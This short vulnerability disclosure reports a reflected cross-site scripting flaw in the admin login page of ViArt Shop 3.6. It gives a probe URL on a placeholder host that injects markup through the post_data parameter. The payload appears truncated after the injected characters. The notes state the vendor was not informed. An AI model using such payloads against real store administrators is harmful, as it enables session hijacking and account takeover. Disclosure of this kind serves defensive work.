Application: ViArt Shop 3.6 Authors Site: http://www.viart.com/ +--------------------------------------------------------------------------------------------+ [1]------------------------------------------------------------------------------------------> XSS: http://www.victim.com/viartshop/admin/admin_login.php?operation=login&post_data=1>"> +-[Notes:]-----------------------------------------------------------------------------------+ Vulnerabilities found on: 01/03/2010 Author(s) Informed on: Not Informed Author(s) Response: NA Author(s) Fix: NA JohnC@NoBytes.com http://www.NoBytes.com